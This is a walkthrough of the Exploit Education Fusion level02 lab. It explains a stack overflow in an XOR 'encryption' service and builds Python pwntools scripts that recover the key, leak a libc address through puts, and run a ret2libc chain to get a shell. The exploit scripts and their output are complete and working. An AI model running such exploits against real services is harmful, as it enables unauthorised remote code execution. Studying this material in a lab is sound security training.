This level deals with some basic obfuscation / math stuff.

This level introduces non-executable memory and return into libc / .text / return orientated programming (ROP).

The description and source code can be found here:
http://exploit.education/fusion/level02/

Contents hide

1 Source Code Analysis

2 Interacting With The Program

3 Cheating

4 Leaking Libc Address

4.1 Side Note

5 Exploitation

Source Code Analysis

For this level, I looked at the source code and came up with a plan of attack before even launching the Fusion VM. Let’s step through it. I won’t bother with main() as it’s only relevant purpose is to call the encrypt_file() function. That function may look kinda long, but it’s actually pretty simple.

void encrypt_file() {
  // http://thedailywtf.com/Articles/Extensible-XML.aspx
  // maybe make bigger for inevitable xml-in-xml-in-xml ?
  unsigned char buffer[32 * 4096];

  unsigned char op;
  size_t sz;
  int loop;

  printf("[-- Enterprise configuration file encryption service --]\n");
  
  loop = 1;
  while(loop) {
      nread(0, &op, sizeof(op));
      switch(op) {
          case 'E':
              nread(0, &sz, sizeof(sz));
              nread(0, buffer, sz);
              cipher(buffer, sz);
              printf("[-- encryption complete. please mention "
              "474bd3ad-c65b-47ab-b041-602047ab8792 to support "
              "staff to retrieve your file --]\n");
              nwrite(1, &sz, sizeof(sz));
              nwrite(1, buffer, sz);
              break;
          case 'Q':
              loop = 0;
              break;
          default:
              exit(EXIT_FAILURE);
      }
  }
}

I’m not sure why those comments at the start of the function are there, they don’t seem to be very relevant. Anyway, a few things are happening:

Several variables are initialized (buffer, op, sz, and loop).
A greeting message is printed.
A while loop begins checking the condition of the “loop” variable (only loops if it’s not 0).
User input is accepted for the “operation” variable.
If that input was “E” then:

Accept user input for the “sz” variable. This sets the size limit for the data to be encrypted.
Accept user input for the “buffer” variable. This will be the data we want encrypted.
Call the cipher() function.
Print a message when the encryption is complete.
Write the size to stdout.
Write the encrypted data to stdout.

If “Q” or anything else is entered for the “op” then exit.

You may have noticed the vulnerability here. The user can specify the maximum size of the input. Even though there’s 131,072 bytes (32 * 4096) allocated to the “buffer” variable, it doesn’t matter as the user can simply specify a higher number.

The cipher() function is a bit more complex, even though it’s not a proper encryption algorithm.

void cipher(unsigned char *blah, size_t len) {
  static int keyed;
  static unsigned int keybuf[XORSZ];

  int blocks;
  unsigned int *blahi, j;

  if(keyed == 0) {
      int fd;
      fd = open("/dev/urandom", O_RDONLY);
      if(read(fd, &keybuf, sizeof(keybuf)) != sizeof(keybuf))
        exit(EXIT_FAILURE);
      close(fd);
      keyed = 1;
  }

  blahi = (unsigned int *)(blah);
  blocks = (len / 4);
  if(len & 3) blocks += 1;

  for(j = 0; j < blocks; j++) {
      blahi[j] ^= keybuf[j % XORSZ];
  }
}

Variables are declared (blah, len, keyed, keybuf, blocks, blahi, j).
If the “keyed” variable is not equal to 0, then do the following:

Open the “/dev/urandom” file.
Read 32 bytes (sizeof(keybuf)) from “/dev/urandom” into the “keybuf” variable
Set the “keyed” variable to 1.

Set “blahi” (an unsigned int pointer) to point to “blah” (the data to encrypt)
Set the “blocks” variable to be the user-supplied length (“len” variable) divided by 4.
If the “len” variable is not divisible by 4, then add 1 to the “blocks” variable.
A for loop that performs the encryption, 4 bytes at a time (keybuf & blahi are unsigned ints).

This encryption “algorithm” will simply XOR the data with whatever is in “keybuf”

While there is the obvious buffer overflow vulnerability, the problem is that whatever data you send will be XOR’ed with a random key. After looking at the source code for a while, I did spot one more mistake. If the cipher() function is called multiple time, the “keybuf” variable will be the same each time. The “keyed” variable is declared but not initialized and it should occupy the same memory address each time. So, I should be able to send data, take the encrypted form, XOR the two together and get the key. Then, I can overwrite the saved EIP value with an “encrypted” address so that when the encryption happens on it, the desired “unencrypted” address will be left.

Interacting With The Program

The next step is to figure out how the program was intended to be used. This was a bit harder than I expected and couldn’t get it to work by simply using netcat and manually entering the expected input. One reason for this is that the “sz” (size) variable it’s expecting is a 4-byte integer. If I supplied “58” as input, it looks at that as “\x38\x35” (little-endian). What I need to send it, is “\x3a\x00\x00\x00”. That, coupled with figuring out where it wanted a newline character, made this a tedious task of trial-and-error. I suppose it wouldn’t have taken so long if I understood the C language a bit better, but such is life. Anyway, here’s a script I came up with to interact with the program in it’s intended fashion:

#!/usr/bin/env python3

from pwn import *

io = remote("fusion", 20002)

data = "Lorem ipsum dolor sit amet, consectetur adipiscing elit."
print(io.recvline().decode())
io.send("E")
io.send((len(data)).to_bytes(4, "little"))
io.send(data)

print(io.recvline().decode())
size = int.from_bytes(io.recv(4), 'little')
encrypted = b""
while len(encrypted) < size:
    encrypted += io.recv(size)

log.info(f"Size = {size}")
log.info("Encrypted message:")
print(encrypted)
print()
io.close()

andrew ~/fusion/level02 $ ./level02_test.py 
[+] Opening connection to fusion on port 20002: Done
[-- Enterprise configuration file encryption service --]

[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]

[*] Size = 56
[*] Encrypted message:
b"\x8b\xc7\x86\xfe.\x17\xb0\xd1\x04\xdb&\x10%n\xa6Bg_`\xce\xa7\x14\x9c \xce\x82\x93\x14\xef\xc7.M\xa3\xd7{d'\xef\xb7\xa2\x0e\xce\xa3\xb5\x90\xd4\xf5.j\x15[\x9d\nH\x18z"

[*] Closed connection to fusion port 20002

Now that I’ve got that working, I’ll start building out the attack. I’ll use a “ret2libc” technique to bypass both ASLR and NX protections.

Cheating

I like to build my exploits (or any script I write) and test them incrementally so that if something goes wrong, I’ll have a better idea of what the problem was. First, I’ll write the exploit pretending that ASLR is not enabled. I plan to create a ROP chain that calls system() with a “/bin/sh” string passed to it. Normally, with ASLR enabled, the address of system() would be randomized (along with everything else in libc) and you’d have no way of knowing it when attacking a remote machine. In this case, I know that the parent process for “level02” is not restarted each time a connection is made & closed. This means that I can attach to the process with GDB, print the address of system(), and use that in my ROP chain knowing that it won’t change (until I restart the VM or the parent process).

Getting the address of system():

fusion@fusion ~ $ ps aux | grep level02
20002     1201  0.0  0.0   1816    52 ?        Ss   05:44   0:00 /opt/fusion/bin/level02
fusion    1463  0.0  0.0   4184   796 pts/0    S+   05:45   0:00 grep --color=auto level02

fusion@fusion ~ $ sudo gdb -q -p 1201
[sudo] password for fusion:
warning: not using untrusted file "/home/fusion/.gdbinit"
Attaching to process 1201
Reading symbols from /opt/fusion/bin/level02...done.
Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb77cb424 in __kernel_vsyscall ()

(gdb) p system
$1 = {<text variable, no debug info>} 0xb767fb20 <__libc_system>

(gdb) p exit
$2 = {<text variable, no debug info>} 0xb76759e0 <__GI_exit>

(gdb) find 0xb767fb20, +9999999, "/bin/sh"
0xb777b8da
warning: Unable to access target memory at 0xb77bdf62, halting search.
1 pattern found.

I also grabbed the address of exit() so the program will cleanly exit when I close the shell. It’s not necessary here, but why not create good habits? I also did a search for a “/bin/sh” string starting at the address of system(). This will also be randomized but I can just hard-code it into my script for now.

Here’s the “cheat” exploit:

#!/usr/bin/env python3

from pwn import *


def encrypt(data):
    io.send("E")
    io.send((len(data)).to_bytes(4, "little"))
    io.send(data)

    print(io.recvline().decode())
    size = int.from_bytes(io.recv(4), 'little')
    encrypted = b""
    while len(encrypted) < size:
        encrypted += io.recv(size)

    return encrypted


io = remote("fusion", 20002)
print(io.recvline().decode())

data = "A" * 128
encrypted = encrypt(data)
key = bytes(a ^ b for a, b in zip(data.encode(), encrypted))

payload  = b"A" * 131088
payload += p32(0xb767fb20)  # Address of system()
payload += p32(0xb76759e0)  # Address of exit()
payload += p32(0xb777b8da)  # Address of "/bin/sh"

enc_data = b""
for i in range(0, len(payload), len(key)):
    enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key))

encrypt(enc_data)

io.send("Q")
io.interactive()

At this point, I shouldn’t have to explain how to find the offset of the saved return address (the 131088 number). You can see that I have the 3 addresses in my ROP chain. The address for exit() comes after system() so that when system() hits ret, it’ll pop the address for exit() into EIP and cleanly exit the program. The address for the “/bin/sh” string is last because system() will look to ESP+4 for an argument.

Testing it out:

andrew ~/fusion/level02 $ ./level02_system.py 
[+] Opening connection to fusion on port 20002: Done
[-- Enterprise configuration file encryption service --]

[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]

[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]

[*] Switching to interactive mode
$ id
uid=20002 gid=20002 groups=20002

Leaking Libc Address

The next step is to figure out how to get base address of libc. I used this blog post by @D4mianWayne to get a better understanding of ret2libc attacks and leaking the libc address:
https://d4mianwayne.github.io/posts/ret2libc-pwntools

That post explains, exactly, what I’ll need to do for this challenge with the only difference being the architecture. That post uses an x64 binary so function arguments are passed in registers instead of the stack.

The idea here is to overwrite the saved return address on the stack with the address of puts@plt while passing a single argument to that “call,” the address of puts@got. After you send that payload, you’ll receive some unpacked addresses, the first of which should be the address of puts(). You can use that to calculate the base address of libc. Looking at the symbols in libc, you can find the offset to puts() and subtract that from the actual address that was leaked. This gives you libc’s base address, from which you can calculate the actual address of any other function. Just find the offset and add that to the base address.

First, I’ll get the PLT and GOT addresses for puts() in the level02 binary:

fusion@fusion ~ $ objdump -d /opt/fusion/bin/level02 | grep -A1 puts
08048930 <puts@plt>:
 8048930:       ff 25 b8 b3 04 08       jmp    *0x804b3b8
...

This shows that the PLT address is 0x8048930 and GOT address is 0x804b3b8.

Now I’ll need to find the puts() offset within libc. To determine which libc binary is being used by this process, I can attach to it with GDB again:

fusion@fusion ~ $ sudo gdb -q -p 1201
[sudo] password for fusion: 
warning: not using untrusted file "/home/fusion/.gdbinit"
Attaching to process 1201
Reading symbols from /opt/fusion/bin/level02...done.
Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb77cb424 in __kernel_vsyscall ()

(gdb) info sharedlibrary 
From        To          Syms Read   Shared Object Library
0xb7659be0  0xb7766784  Yes         /lib/i386-linux-gnu/libc.so.6
0xb77cc830  0xb77e35cf  Yes (*)     /lib/ld-linux.so.2
(*): Shared library is missing debugging information.

While I’m here, I’m going to get the actual puts() address so I can verify my results later on:

(gdb) p puts
$1 = {<text variable, no debug info>} 0xb76a33b0 <_IO_puts>

To get the offset of puts(), I can use readelf to list the symbols in libc and grep for “puts”:

fusion@fusion ~ $ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " puts@"
   423: 000603b0   444 FUNC    WEAK   DEFAULT   12 puts@@GLIBC_2.0

Now I need to modify my Python script to capture the address:

#!/usr/bin/env python3

from pwn import *

io = remote("fusion", 20002)

def encrypt(data):
    io.send("E")
    io.send((len(data)).to_bytes(4, "little"))
    io.send(data)

    print(io.recvline().decode())
    size = int.from_bytes(io.recv(4), 'little')
    encrypted = b""
    while len(encrypted) < size:
        encrypted += io.recv(size)

    return encrypted


print(io.recvline().decode())

data = "A" * 128
encrypted = encrypt(data)

sample = data[:128].encode()
key = bytes(a ^ b for a, b in zip(sample, encrypted))

payload  = b"A" * 131088
payload += p32(0x08048930)  # Address of puts@plt
payload += b"AAAA"
payload += p32(0x0804b3b8)  # Address of puts@got

enc_data = b""
for i in range(0, len(payload), len(key)):
    enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key))

encrypt(enc_data)

io.send("Q")
puts_offset = 0x603b0
leak = u32(io.recv(4))
libc_base = leak - puts_offset
log.info(f"Leaked puts() address: {hex(leak)}")
log.info(f"Libc puts() offset:    {hex(puts_offset)}")
log.info(f"Libc base address:     {hex(libc_base)}")
print()
io.close()

Let’s run it:

andrew ~/fusion/level02 $ ./level02_puts.py 
[+] Opening connection to fusion on port 20002: Done
[-- Enterprise configuration file encryption service --]

[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]

[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]

[*] Leaked puts() address: 0xb76583b0
[*] Libc puts() offset:    0x603b0
[*] Libc base address:     0xb75f8000

[*] Closed connection to fusion port 20002

That leaked address (0xb76583b0) is the same as the one I got from GDB on the Fusion VM.

Side Note

What if I didn’t have access to the libc binary and didn’t know what version it was? Each version is bound to have different offsets from its base address. Well, after leaking the address of puts(), you could use a tool, like libc-database, to get the version of libc. For example, take the leaked puts() address (0xb76583b0) and do a search based on the last 3 digits:

andrew ~/libc-database (master) $ ./find puts 3b0
archive-old-eglibc (id libc6_2.13-20ubuntu5_i386)
archive-old-glibc (id libc6_2.5-0ubuntu14_amd64)
archive-old-glibc (id libc6-amd64_2.5-0ubuntu14_i386)

Since I got multiple results, I could either leak another address and add it to the search, or just use trial and error in my exploit. However, I happen to know that the actual libc version used here is that first result.

Exploitation

I need a few more offset addresses to build this exploit. I’ll need the offset of exit() (to cleanly exit the program when the shell closes) and system():

fusion@fusion ~ $ readelf -s /lib/i386-linux-gnu/libc.so.6 | egrep " system| exit"
   135: 000329e0    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
  1409: 0003cb20   139 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0

And I’ll need the string “/bin/sh” to be somewhere in memory. I could generate a rop chain to do this for me by using strcpy() to put certain bytes into a writable section (such as .bss). However, I know that the string I need is already in libc so I can find the offset to it using strings:

fusion@fusion ~ $ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
 1388da /bin/sh

Final exploit script:

#!/usr/bin/env python3

from pwn import *


def encrypt(data):
    io.send("E")
    io.send((len(data)).to_bytes(4, "little"))
    io.send(data)

    print(io.recvline().decode())
    size = int.from_bytes(io.recv(4), "little")
    encrypted = b""
    while len(encrypted) < size:
        encrypted += io.recv(size)

    return encrypted


def get_key():
    print(io.recvline().decode())
    data = "A" * 128
    encrypted = encrypt(data)
    sample = data.encode()

    return bytes(a ^ b for a, b in zip(sample, encrypted))


io = remote("fusion", 20002)
key = get_key()

payload  = b"A" * 131088
payload += p32(0x08048930)  # Address of puts@plt
payload += b"AAAA"
payload += p32(0x0804b3b8)  # Address of puts@got

enc_data = b""
for i in range(0, len(payload), len(key)):
    enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key))
encrypt(enc_data)

io.send("Q")
puts_offset = 0x603b0
leak = u32(io.recv(4))
libc_base = leak - puts_offset
io.close()

# Now to get shell
io = remote("fusion", 20002)
key = get_key()

system_offset = 0x3cb20
exit_offset   = 0x329e0
binsh_offset  = 0x1388da

payload  = b"A" * 131088
payload += p32(libc_base + system_offset)
payload += p32(libc_base + exit_offset)
payload += p32(libc_base + binsh_offset)

enc_data = b""
for i in range(0, len(payload), len(key)):
    enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key))
encrypt(enc_data)

io.send("Q")
io.interactive()